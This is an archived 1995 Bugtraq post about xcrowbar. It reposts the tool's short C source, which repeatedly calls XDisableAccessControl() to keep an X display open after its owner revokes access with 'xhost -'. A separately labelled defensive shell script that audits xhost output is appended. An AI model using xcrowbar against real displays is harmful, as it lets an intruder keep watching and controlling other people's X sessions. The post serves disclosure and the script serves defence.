Bugtraq mailing list archives

xcrowbar


From: wam () cs purdue edu (William McVey)
Date: Wed, 11 Jan 1995 13:27:36 -0500


der Mouse wrote:
> What's xcrowbar, and how does it "turn[] off the authority mechanisms
> altogether"?  In my experience, only clients running on the local host,
> or the xdm host if the server was started with xdm, can fiddle with the
> access control mechanisms.

Since several people have asked me about xcrowbar in private mail, I'm
just going to reply to the group.  xcrowbar was posted to
comp.security.unix a few months back.  Since the source code is so
short and the problem (people give access to their displays to
untrustworthy people) has a known solution (only give trustworthy
people access to your display), I'm reposting the article here. I've
attached the original article (minus a few headers) to the bottom of
this mail.  It should be obvious what it does.

As for only the local host or xdm host being able to "fiddle with the
access control mechanism", I highly doubt that the statement is true.
X servers (well, at least the distributed ones) don't pay any special
attention to whether a client is local or remote.

> In any case, yes, it's true that "xhost -" doesn't magically mean
> you're safe again.  What I do, to get the convenience of "xhost -"
> without giving up quite as much security, is I run a front-end program
> that accepts connections, ...
> <snip>

I don't suppose the program you run is freely available someplace?

 -- William

 ---- Begin article about xcrowbar ----

 Article: 8570 of comp.security.unix
 From: matt () cs su oz au (Robert Matthew Barrie)
 Newsgroups: comp.security.unix
 Subject: xcrowbar.c
 Date: 1 Oct 1994 05:32:44 GMT
 Organization: Basser Department of Computer Science, University of Sydney
 Distribution: world
 Message-ID: <36is9s$qrb () staff cs su oz au>

Like I said, a simple program that lets you do an XDisableAccessControl()
on a display if someone decides to "xhost -" you after you have a
pointer to their display.

matt


 --- cut here
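#include <stdio.h>
#include <stdlib.h>
#include <X11/Xlib.h>


int main(int argc, char *argv[])
{
    Display *dpy;
    char *dis = NULL;   /* NULL makes XOpenDisplay() fall back to $DISPLAY */
    int c;

    if (argc > 1)
        dis = argv[1];

    if ((dpy = XOpenDisplay(dis)) == NULL) {
        perror("could not open window");
        exit(1);
    }

    /* Every input character other than 'q' calls XDisableAccessControl()
       again; 'q' or end of input leaves the loop. */
    while ((c = getchar()) != 'q' && c != EOF)
        XDisableAccessControl(dpy);

    XCloseDisplay(dpy);
    return 0;
}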

 ---- End article about xcrowbar ----
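
A defender-side check for the condition discussed in this thread, as an added example that is not part of the original post: it parses the output of `xhost` and flags a display whose access control has been switched off or that still carries host-based entries. The sample outputs, host name and user name are constructed, and the function name `audit_xhost` is hypothetical.

```shell
#!/bin/sh
# Added example (not from the original post): audit `xhost` output.
# Reads xhost output on stdin and prints one finding per line.
# Exit status: 0 = nothing flagged, 1 = flagged, 2 = unparseable input.
audit_xhost() {
    awk '
        # First line of xhost output reports the access control state.
        NR == 1 && /^access control disabled/ {
            print "CRITICAL access control disabled: any host may connect"
            seen = 1; bad = 1; next
        }
        NR == 1 && /^access control enabled/ { seen = 1; next }
        NR == 1 { exit }                         # not xhost output at all
        # Remaining lines are access-list entries.
        /^SI:localuser:/ || /^LOCAL:/ { next }   # local-only entries
        NF {
            print "WARN host-based entry: " $1
            bad = 1
        }
        END {
            if (!seen) { print "ERROR no access control status line"; exit 2 }
            exit (bad ? 1 : 0)
        }
    '
}

# Constructed sample: access control off, one remote host still listed.
SAMPLE_OPEN='access control disabled, clients can connect from any host
INET:lab7.example.edu
SI:localuser:alice'

# Constructed sample: access control on, only a local user entry.
SAMPLE_LOCKED='access control enabled, only authorized clients can connect
SI:localuser:alice'

# Demo on the constructed samples; on a live display use: xhost | audit_xhost
for s in "$SAMPLE_OPEN" "$SAMPLE_LOCKED"; do
    printf '%s\n' "$s" | audit_xhost || echo "(flagged, status $?)"
done
```

Run periodically against a live display, a non-zero status is the signal to re-enable access control and review which clients are still connected.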


